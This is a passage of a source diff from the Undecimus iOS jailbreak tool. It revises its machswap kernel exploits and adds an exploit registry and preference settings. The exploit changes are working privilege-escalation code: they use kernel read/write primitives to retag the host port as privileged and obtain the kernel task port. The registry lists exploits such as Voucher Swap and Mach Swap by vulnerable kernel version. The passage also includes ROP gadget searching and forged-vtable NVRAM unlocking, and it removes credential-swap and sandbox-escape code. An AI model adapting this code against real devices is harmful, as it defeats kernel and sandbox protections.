+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
+extern uint64_t cached_proc_struct_addr;
 
 // ********** ********** ********** ye olde pwnage ********** ********** **********
 
@@ -647,13 +650,11 @@ kern_return_t machswap2_exploit(machswap_offsets_t *offsets)
     int total_pipes = 0;
     
     host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
     thread_t thread = THREAD_NULL;
     
     /********** ********** data hunting ********** **********/
 
     host = mach_host_self();
-    original_host = host;
     thread = mach_thread_self();
     vm_size_t pgsz = 0;
     ret = _host_page_size(host, &pgsz);
@@ -1240,6 +1241,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
     uint64_t itk_space = 0x0;
     rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
     LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    LOG("host_port_addr: 0x%llx", host_port_addr);
 
     uint64_t ourtask = 0x0;
     rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -1379,6 +1388,7 @@ value = value | ((uint64_t)read64_tmp << 32);\
         goto out;
     }
     LOG("got ourproc: 0x%llx", ourproc);
+    cached_proc_struct_addr = ourproc;
     
     /* find kernproc by looping linked list */
 
@@ -1514,46 +1524,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
         allows the kernel task port to be accessed by any root process 
     */
     WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
     
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    LOG("original ucred: 0x%llx", orig_ucred);
-
-    int orig_uid = getuid();
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
     
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-
-    host = mach_host_self();
     mach_port_t hsp4;
     ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_host_self(), host);
-    host = original_host;
     
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elelvate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);
 
     if (ret != KERN_SUCCESS ||
         !MACH_PORT_VALID(hsp4))
@@ -1613,7 +1591,6 @@ out:;
     if (MACH_PORT_VALID(host)) {
         mach_port_deallocate(mach_task_self(), host);
         host = HOST_NULL;
-        original_host = HOST_NULL;
     }
     
     if (MACH_PORT_VALID(thread)) {

Undecimus/source/machswap_pwn.m

@@ -341,6 +341,9 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
+extern uint64_t cached_proc_struct_addr;
 
 // ********** ********** ********** ye olde pwnage ********** ********** **********
 
@@ -355,13 +358,11 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets)
     mach_port_t after[0x1000] = { };
     
     host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
     thread_t thread = THREAD_NULL;
 
     /********** ********** data hunting ********** **********/
 
     host = mach_host_self();
-    original_host = host;
     thread = mach_thread_self();
     vm_size_t pgsz = 0;
     ret = _host_page_size(host, &pgsz);
@@ -686,6 +687,24 @@ value = value | ((uint64_t)read64_tmp << 32)
         goto out;
     }
     LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    if (is_table == 0x0) {
+        LOG("failed to find is_table!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    if (host_port_addr == 0x0) {
+        LOG("failed to find host_port_addr!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("host_port_addr: 0x%llx", host_port_addr);
 
     uint64_t ourtask = 0x0;
     rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -831,6 +850,7 @@ value = value | ((uint64_t)read64_tmp << 32)
     uint64_t ourproc = 0x0;
     rk64(ourtask + offsets->struct_offsets.task_bsd_info, ourproc);
     LOG("got ourproc: 0x%llx", ourproc);
+    cached_proc_struct_addr = ourproc;
 
     /* find kernproc by looping linked list */
 
@@ -955,61 +975,14 @@ value = value | ((uint64_t)read64_tmp << 32)
         allows the kernel task port to be accessed by any root process 
     */
     WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
     
-    int orig_uid = getuid();
-
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    if (orig_ucred == 0x0)
-    {
-        LOG("failed to get orig_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("orig_ucred: 0x%llx", orig_ucred);
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    if (kern_ucred == 0x0)
-    {
-        LOG("failed to get kern_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("kern_ucred: 0x%llx", kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
     
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    
-    host = mach_host_self();
     mach_port_t hsp4;
     ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_host_self(), host);
-    host = original_host;
     
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elevate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);
 
     if (ret != KERN_SUCCESS ||
         !MACH_PORT_VALID(hsp4))
@@ -1032,7 +1005,6 @@ value = value | ((uint64_t)read64_tmp << 32)
     if (MACH_PORT_VALID(host)) {
         mach_port_deallocate(mach_task_self(), host);
         host = MACH_PORT_NULL;
-        original_host = HOST_NULL;
     }
     
     if (MACH_PORT_VALID(thread)) {

Undecimus/source/prefs.h

@@ -27,12 +27,15 @@
 #define K_ECID                     "Ecid"
 #define K_INSTALL_OPENSSH          "InstallOpenSSH"
 #define K_INSTALL_CYDIA            "InstallCydia"
-#define K_RELOAD_SYSTEM_DAEMONS    "ReloadSystemDaemons"
+#define K_RELOAD_SYSTEM_DAEMONS    "DoReloadSystemDaemons"
 #define K_HIDE_LOG_WINDOW          "HideLogWindow"
 #define K_RESET_CYDIA_CACHE        "ResetCydiaCache"
 #define K_SSH_ONLY                 "SSHOnly"
-#define K_ENABLE_GET_TASK_ALLOW    "EnableGetTaskAllow"
+#define K_DARK_MODE                "DarkMode"
+#define K_ENABLE_GET_TASK_ALLOW    "DoEnableGetTaskAllow"
 #define K_SET_CS_DEBUGGED          "SetCSDebugged"
+#define K_AUTO_RESPRING            "AutoRespring"
+#define K_CODE_SUBSTITUTOR         "CodeSubstitutor"
 
 typedef struct {
     bool load_tweaks;
@@ -55,7 +58,10 @@ typedef struct {
     bool enable_get_task_allow;
     bool set_cs_debugged;
     bool hide_log_window;
+    bool auto_respring;
+    bool dark_mode;
     int exploit;
+    int code_substitutor;
 } prefs_t;
 
 prefs_t *new_prefs(void);

Undecimus/source/prefs.m

@@ -51,7 +51,9 @@ bool load_prefs(prefs_t *prefs) {
     prefs->export_kernel_task_port = (bool)[[userDefaults objectForKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile] boolValue];
     prefs->restore_rootfs = (bool)[[userDefaults objectForKey:@K_RESTORE_ROOTFS inDomain:prefsFile] boolValue];
     prefs->increase_memory_limit = (bool)[[userDefaults objectForKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile] boolValue];
-    prefs->ecid = (const char *)[[userDefaults objectForKey:@K_ECID inDomain:prefsFile] UTF8String];
+    if ([[userDefaults objectForKey:@K_ECID inDomain:prefsFile] isKindOfClass:NSString.class]) {
+        prefs->ecid = (const char *)[[userDefaults objectForKey:@K_ECID inDomain:prefsFile] UTF8String];
+    }
     prefs->install_cydia = (bool)[[userDefaults objectForKey:@K_INSTALL_CYDIA inDomain:prefsFile] boolValue];
     prefs->install_openssh = (bool)[[userDefaults objectForKey:@K_INSTALL_OPENSSH inDomain:prefsFile] boolValue];
     prefs->reload_system_daemons = (bool)[[userDefaults objectForKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile] boolValue];
@@ -61,6 +63,9 @@ bool load_prefs(prefs_t *prefs) {
     prefs->set_cs_debugged = (bool)[[userDefaults objectForKey:@K_SET_CS_DEBUGGED inDomain:prefsFile] boolValue];
     prefs->exploit = (int)[[userDefaults objectForKey:@K_EXPLOIT inDomain:prefsFile] intValue];
     prefs->hide_log_window = (bool)[[userDefaults objectForKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile] boolValue];
+    prefs->auto_respring = (bool)[[userDefaults objectForKey:@K_AUTO_RESPRING inDomain:prefsFile] boolValue];
+    prefs->dark_mode = (bool)[[userDefaults objectForKey:@K_DARK_MODE inDomain:prefsFile] boolValue];
+    prefs->code_substitutor = (int)[[userDefaults objectForKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile] intValue];
     return true;
 }
 
@@ -72,14 +77,14 @@ bool set_prefs(prefs_t *prefs) {
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->load_daemons] forKey:@K_LOAD_DAEMONS inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dump_apticket] forKey:@K_DUMP_APTICKET inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->run_uicache] forKey:@K_REFRESH_ICON_CACHE inDomain:prefsFile];
-    [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->boot_nonce] forKey:@K_BOOT_NONCE inDomain:prefsFile];
+    if (prefs->boot_nonce) [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->boot_nonce] forKey:@K_BOOT_NONCE inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates] forKey:@K_DISABLE_AUTO_UPDATES inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes] forKey:@K_DISABLE_APP_REVOKES inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce] forKey:@K_OVERWRITE_BOOT_NONCE inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port] forKey:@K_EXPORT_KERNEL_TASK_PORT inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->restore_rootfs] forKey:@K_RESTORE_ROOTFS inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit] forKey:@K_INCREASE_MEMORY_LIMIT inDomain:prefsFile];
-    [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->ecid] forKey:@K_ECID inDomain:prefsFile];
+    if (prefs->ecid) [userDefaults setObject:[NSString stringWithUTF8String:(const char *)prefs->ecid] forKey:@K_ECID inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_cydia] forKey:@K_INSTALL_CYDIA inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->install_openssh] forKey:@K_INSTALL_OPENSSH inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons] forKey:@K_RELOAD_SYSTEM_DAEMONS inDomain:prefsFile];
@@ -89,6 +94,9 @@ bool set_prefs(prefs_t *prefs) {
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged] forKey:@K_SET_CS_DEBUGGED inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->exploit] forKey:@K_EXPLOIT inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->hide_log_window] forKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->auto_respring] forKey:@K_AUTO_RESPRING inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dark_mode] forKey:@K_DARK_MODE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->code_substitutor] forKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile];
     [userDefaults synchronize];
     return true;
 }
@@ -111,16 +119,34 @@ void register_default_prefs() {
     defaults[@K_INSTALL_OPENSSH] = @NO;
     defaults[@K_RELOAD_SYSTEM_DAEMONS] = @YES;
     defaults[@K_SSH_ONLY] = @NO;
-    defaults[@K_ENABLE_GET_TASK_ALLOW] = @NO;
+    defaults[@K_ENABLE_GET_TASK_ALLOW] = @YES;
     defaults[@K_SET_CS_DEBUGGED] = @NO;
     defaults[@K_HIDE_LOG_WINDOW] = @NO;
+    defaults[@K_AUTO_RESPRING] = @NO;
+    defaults[@K_DARK_MODE] = @YES;
     defaults[@K_EXPLOIT] = [NSNumber numberWithInteger:recommendedJailbreakSupport()];
+    defaults[@K_CODE_SUBSTITUTOR] = [NSNumber numberWithInteger:recommendedSubstitutorSupport()];
     [userDefaults registerDefaults:defaults];
 }
 
 void repair_prefs() {
     prefs_t *prefs = copy_prefs();
-    if (!supportsExploit(prefs->exploit)) prefs->exploit = (int)recommendedJailbreakSupport();
+    if (prefs->exploit != -1) {
+        exploit_info_t *exploit_info = get_exploit_info(prefs->exploit);
+        if (exploit_info != NULL) {
+            if (!checkDeviceSupport(exploit_info->device_support_info)) {
+                prefs->exploit = (int)recommendedJailbreakSupport();
+            }
+        }
+    }
+    if (prefs->code_substitutor != -1) {
+        substitutor_info_t *substitutor_info = get_substitutor_info(prefs->code_substitutor);
+        if (substitutor_info != NULL) {
+            if (!checkDeviceSupport(substitutor_info->device_support_info)) {
+                prefs->code_substitutor = (int)recommendedSubstitutorSupport();
+            }
+        }
+    }
     set_prefs(prefs);
     release_prefs(&prefs);
 }

Undecimus/source/remote_call.c

@@ -17,8 +17,8 @@
 
 #if !__arm64e__
 static uint64_t find_gadget_candidate(char **alternatives, size_t gadget_length) {
-    auto const haystack_start = (void *)atoi; // will do...
-    auto haystack_size = 100*1024*1024; // likewise...
+    void *const haystack_start = (void *)atoi; // will do...
+    size_t haystack_size = 100*1024*1024; // likewise...
     
     for (char *candidate = *alternatives; candidate != NULL; alternatives++) {
         void *found_at = memmem(haystack_start, haystack_size, candidate, gadget_length);
@@ -36,7 +36,7 @@ static uint64_t find_blr_x19_gadget()
     if (blr_x19_addr != 0){
         return blr_x19_addr;
     }
-    auto const blr_x19 = "\x60\x02\x3f\xd6";
+    char *const blr_x19 = "\x60\x02\x3f\xd6";
     char* candidates[] = {blr_x19, NULL};
     blr_x19_addr = find_gadget_candidate(candidates, 4);
     return blr_x19_addr;

Undecimus/source/unlocknvram.c

@@ -41,7 +41,7 @@ uint64_t get_iodtnvram_obj(void) {
             LOG("Failed to get IODTNVRAM service");
             return 0;
         }
-        uint64_t nvram_up = get_address_of_port(getpid(), IODTNVRAMSrv);
+        uint64_t nvram_up = get_address_of_port(proc_struct_addr(), IODTNVRAMSrv);
         IODTNVRAMObj = ReadKernel64(nvram_up + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
 
         LOG("IODTNVRAM obj at 0x%llx", IODTNVRAMObj);
@@ -72,7 +72,7 @@ int unlocknvram(void) {
         kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);
 
     // allocate buffer in kernel
-    fake_vtable_xpac = kmem_alloc_wired(kernel_buffer_size);
+    fake_vtable_xpac = IOMalloc(kernel_buffer_size);
     
     // Forge the pacia pointers to the virtual methods.
     size_t count = 0;
@@ -119,7 +119,7 @@ int locknvram(void) {
     }
     
     WriteKernel64(obj, orig_vtable);
-    kmem_free(fake_vtable_xpac, kernel_buffer_size);
+    SafeIOFreeNULL(fake_vtable_xpac, kernel_buffer_size);
 
     LOG("Locked nvram");
     return 0;

Undecimus/source/utils.h

@@ -10,6 +10,7 @@
 #define _UTILS_H
 #import <sys/types.h>
 #import <sys/stat.h>
+#include <mach/machine.h>
 #import "ArchiveFile.h"
 
 #define system(x) _system(x)
@@ -32,6 +33,63 @@ typedef enum {
     kalloc_crash
 } exploit_t;
 
+typedef enum {
+    substrate_substitutor = 0,
+} substitutor_t;
+
+typedef enum {
+    jailbreak_capability = 0,
+    respring_capability,
+    reboot_capability
+} exploit_capability_t;
+
+typedef enum {
+    lowest_exploit_reliability = 0,
+    low_exploit_reliability,
+    middle_exploit_reliability,
+    high_exploit_reliability,
+    highest_exploit_reliability
+} exploit_reliability;
+
+typedef struct {
+    const char *min_kernel_version;
+    const char *max_kernel_version;
+    bool (^handler)(void);
+} device_support_info_t;
+
+typedef struct {
+    exploit_t exploit;
+    const char *name;
+    exploit_capability_t exploit_capability;
+    exploit_reliability exploit_reliability;
+    device_support_info_t device_support_info;
+} exploit_info_t;
+
+typedef enum {
+    lowest_substitutor_stability = 0,
+    low_substitutor_stability,
+    middle_substitutor_stability,
+    high_substitutor_stability,
+    highest_substitutor_stability
+} substitutor_stability;
+
+typedef struct {
+    substitutor_t substitutor;
+    const char *name;
+    const char *package_id;
+    const char *startup_executable;
+    const char *server_executable;
+    const char *run_command;
+    const char *loader_killswitch;
+    const char *bootstrap_tools;
+    substitutor_stability substitutor_stability;
+    device_support_info_t device_support_info;
+    char **resources;
+} substitutor_info_t;
+
+extern exploit_info_t *exploit_infos[];
+extern substitutor_info_t *substitutor_infos[];
+
 enum hashtype {
     HASHTYPE_MD5 = 0,
     HASHTYPE_SHA1
@@ -46,6 +104,7 @@ int proc_pidpath(pid_t pid, void *buffer, uint32_t buffersize);
 - (BOOL) registerApplicationDictionary:(id)application;
 - (BOOL) installApplication:(id)application withOptions:(id)options;
 - (BOOL) _LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)system internal:(BOOL)internal user:(BOOL)user;
+- (BOOL) applicationIsInstalled:(id)arg1;
 @end
 
 static inline bool create_file_data(const char *file, int owner, mode_t mode, NSData *data) {
@@ -89,10 +148,10 @@ bool pkgIsInstalled(char *packageID);
 bool pkgIsConfigured(char *packageID);
 bool pkgIsBy(const char *maintainer, const char *packageID);
 bool compareInstalledVersion(const char *packageID, const char *op, const char *version);
-bool extractDeb(NSString *debPath);
-bool extractDebs(NSArray <NSString *> *debPaths);
+bool extractDeb(NSString *debPath, bool doInject);
+bool extractDebs(NSArray <NSString *> *debPaths, bool doInject);
 bool installDeb(const char *debName, bool forceDeps);
-bool installDebs(NSArray <NSString*> *debs, bool forceDeps);
+bool installDebs(NSArray <NSString*> *debs, bool forceDeps, bool forceAll);
 bool removePkg(char *packageID, bool forceDeps);
 bool removePkgs(NSArray <NSString*> *packageIDs, bool forceDeps);
 BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
@@ -100,9 +159,12 @@ NSString *debForPkg(NSString *pkg);
 bool aptUpdate(void);
 bool aptInstall(NSArray <NSString*> *pkgs);
 bool aptUpgrade(void);
+bool aptRepair(void);
 bool runApt(NSArray <NSString*> *args);
 bool extractAptPkgList(NSString *path, ArchiveFile* listcache, id_t owner);
 bool ensureAptPkgLists(void);
+bool removeURLFromSources(NSMutableString *sources, NSString *url);
+void deduplicateSillySources(void);
 bool is_symlink(const char *filename);
 bool is_directory(const char *filename);
 bool is_mountpoint(const char *filename);
@@ -122,11 +184,15 @@ bool machineNameContains(const char *string);
 bool multi_path_tcp_enabled(void);
 bool jailbreakEnabled(void);
 NSString *getKernelBuildVersion(void);
-bool supportsExploit(exploit_t exploit);
+exploit_info_t *get_exploit_info(exploit_t exploit);
+substitutor_info_t *get_substitutor_info(substitutor_t substitutor);
+bool checkDeviceSupport(device_support_info_t device_support);
 bool jailbreakSupported(void);
+bool substitutorSupported(void);
 bool respringSupported(void);
 bool restartSupported(void);
 NSInteger recommendedJailbreakSupport(void);
+NSInteger recommendedSubstitutorSupport(void);
 NSInteger recommendedRestartSupport(void);
 NSInteger recommendedRespringSupport(void);
 bool daemonIsLoaded(char *daemonID);
@@ -160,8 +226,10 @@ vm_size_t get_kernel_page_size(void);
 int waitForFile(const char *filename);
 NSString *hexFromInt(NSInteger val);
 void waitFor(int seconds);
-void blockDomainWithName(const char *name);
-void unblockDomainWithName(const char *name);
+bool blockDomainWithName(const char *name);
+bool unblockDomainWithName(const char *name);
+bool cydiaIsInstalled(void);
+NSString *localize(NSString *str, ...);
 
 extern NSData *lastSystemOutput;
 

Undecimus/source/utils.m

@@ -31,6 +31,149 @@ int logfd=-1;
 bool injectedToTrustCache = false;
 NSMutableArray *toInjectToTrustCache = nil;
 
+exploit_info_t *exploit_infos[] = {
+    &(exploit_info_t)
+    {
+        .exploit = empty_list_exploit,
+        .name = "Empty List",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = lowest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.60.19~25",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = multi_path_exploit,
+        .name = "Multi Path",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = low_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.52.2~8",
+        .device_support_info.handler = ^bool (void) {
+            if (!multi_path_tcp_enabled())
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = async_wake_exploit,
+        .name = "Async Wake",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = highest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.20.62~4",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = voucher_swap_exploit,
+        .name = "Voucher Swap",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = high_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (get_kernel_page_size() != 0x4000)
+                return false;
+            else if (machineNameContains("iPad5,") && kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0)
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = mach_swap_exploit,
+        .name = "Mach Swap",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (get_kernel_page_size() != 0x1000 &&
+                !machineNameContains("iPad5,") &&
+                !machineNameContains("iPhone8,") &&
+                !machineNameContains("iPad6,"))
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = mach_swap_2_exploit,
+        .name = "Mach Swap 2",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = deja_xnu_exploit,
+        .name = "Deja XNU",
+        .exploit_capability = respring_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.70.24~9",
+        .device_support_info.handler = ^bool (void) {
+            if (jailbreakEnabled())
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = necp_exploit,
+        .name = "Necp",
+        .exploit_capability = reboot_capability,
+        .exploit_reliability = highest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.70.24~9",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = kalloc_crash,
+        .name = "Kalloc Crash",
+        .exploit_capability = reboot_capability,
+        .exploit_reliability = high_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.252.2~2",
+        .device_support_info.handler = NULL,
+    },
+    NULL,
+};
+
+substitutor_info_t *substitutor_infos[] = {
+    &(substitutor_info_t)
+    {
+        .substitutor = substrate_substitutor,
+        .name = "Substrate",
+        .package_id = "mobilesubstrate",
+        .startup_executable = "/usr/libexec/substrate",
+        .server_executable = "/usr/libexec/substrated",
+        .run_command = "/etc/rc.d/substrate",
+        .loader_killswitch = "/var/tmp/.substrated_disable_loader",
+        .bootstrap_tools = "/usr/lib/substrate",
+        .substitutor_stability = highest_substitutor_stability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (machineNameContains("iPhone11,") || machineNameContains("iPad8,"))
+                return false;
+            return true;
+        },
+        .resources = (char **)&(const char*[]) {
+            "/usr/libexec/substrate",
+            "/usr/libexec/substrated",
+            NULL,
+        },
+    },
+    NULL,
+};
+
 NSData *lastSystemOutput=nil;
 void injectDir(NSString *dir) {
     NSFileManager *fm = [NSFileManager defaultManager];
@@ -204,7 +347,7 @@ bool compareInstalledVersion(const char *packageID, const char *op, const char *
     return rv;
 }
 
-bool runDpkg(NSArray <NSString*> *args, bool forceDeps) {
+bool runDpkg(NSArray <NSString*> *args, bool forceDeps, bool forceAll) {
     if ([args count] < 2) {
         LOG("%s: Nothing to do", __FUNCTION__);
         return false;
@@ -217,7 +360,9 @@ bool runDpkg(NSArray <NSString*> *args, bool forceDeps) {
                         @"--no-triggers"
                      ]];
     
-    if (forceDeps) {
+    if (forceAll) {
+        [command addObject:@"--force-all"];
+    } else if (forceDeps) {
         [command addObjectsFromArray:@[@"--force-depends", @"--force-remove-essential"]];
     }
     for (NSString *arg in args) {
@@ -232,7 +377,7 @@ bool runDpkg(NSArray <NSString*> *args, bool forceDeps) {
     return !WEXITSTATUS(rv);
 }
 
-bool extractDeb(NSString *debPath) {
+bool extractDeb(NSString *debPath, bool doInject) {
     if (![debPath hasSuffix:@".deb"]) {
         LOG(@"%@: not a deb", debPath);
         return NO;
@@ -260,7 +405,7 @@ bool extractDeb(NSString *debPath) {
         [deb extractFileNum:3 toFd:pipe.fileHandleForWriting.fileDescriptor];
     });
     bool result = [tar extractToPath:@"/"];
-    if ((kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) && result) {
+    if (doInject && result) {
         chdir("/");
         NSMutableArray *toInject = [NSMutableArray new];
         NSDictionary *files = tar.files;
@@ -285,32 +430,32 @@ bool extractDeb(NSString *debPath) {
     return result;
 }
 
-bool extractDebs(NSArray <NSString *> *debPaths) {
+bool extractDebs(NSArray <NSString *> *debPaths, bool doInject) {
     if ([debPaths count] < 1) {
         LOG("%s: Nothing to install", __FUNCTION__);
         return false;
     }
     for (NSString *debPath in debPaths) {
-        if (!extractDeb(debPath))
+        if (!extractDeb(debPath, doInject))
             return NO;
     }
     return YES;
 }
 
 bool installDeb(const char *debName, bool forceDeps) {
-    return runDpkg(@[@"-i", @(debName)], forceDeps);
+    return runDpkg(@[@"-i", @(debName)], forceDeps, false);
 }
 
-bool installDebs(NSArray <NSString*> *debs, bool forceDeps) {
+bool installDebs(NSArray <NSString*> *debs, bool forceDeps, bool forceAll) {
     if ([debs count] < 1) {
         LOG("%s: Nothing to install", __FUNCTION__);
         return false;
     }
-    return runDpkg([@[@"-i"] arrayByAddingObjectsFromArray:debs], forceDeps);
